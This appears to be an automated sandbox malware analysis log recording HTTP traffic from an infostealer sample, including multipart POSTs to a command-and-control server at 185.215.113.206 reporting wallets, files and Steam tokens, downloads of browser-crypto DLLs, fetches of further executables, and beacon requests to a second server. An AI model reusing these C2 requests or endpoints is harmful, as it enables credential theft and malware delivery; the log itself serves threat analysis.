42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="message"plugins------FBKEHJEGCFBFHJJKJEHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="message"fplugins------AAKKKEBFCGDBGDGCFHCB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCGHost: 185.215.113.206Content-Length: 5447Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file"------HIDHIEGIIIECAKEBFBAA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file"------BAFCGIJDAFBKFIECBGCA--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="message"wallets------DBFHDHJKKJDHJJJJKEGH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="message"files------AAKKKEBFCGDBGDGCFHCB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="file"------BKFCAFCFBAEHIDHJDBGC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 2d 2d 0d 0a Data Ascii: ------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="message"ybncbhylepme------IJECBGIJDGCAEBFIIECA--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AKJKFBAFIDAEBFHJKJEB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005522001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005523001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 46 32 39 39 42 35 36 34 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="hwid"28F299B564762778904926------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="build"mars------FIECFBAAAFHIIDGCGCBF--
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 11:23:25 GMTIf-None-Match: "6731e92d-1bc600"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 32 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005524031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005525001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEBFBKKJDHIDHIDBAEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 42 46 42 4b 4b 4a 44 48 49 44 48 49 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 46 32 39 39 42 35 36 34 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 42 46 42 4b 4b 4a 44 48 49 44 48 49 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 42 46 42 4b 4b 4a 44 48 49 44 48 49 44 42 41 45 2d 2d 0d 0a Data Ascii: ------HCAEBFBKKJDHIDHIDBAEContent-Disposition: form-data; name="hwid"28F299B564762778904926------HCAEBFBKKJDHIDHIDBAEContent-Disposition: form-data; name="build"mars------HCAEBFBKKJDHIDHIDBAE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 46 32 39 39 42 35 36 34 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="hwid"28F299B564762778904926------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build"mars------ECGHJJEHDHCAAKFIIDGI--
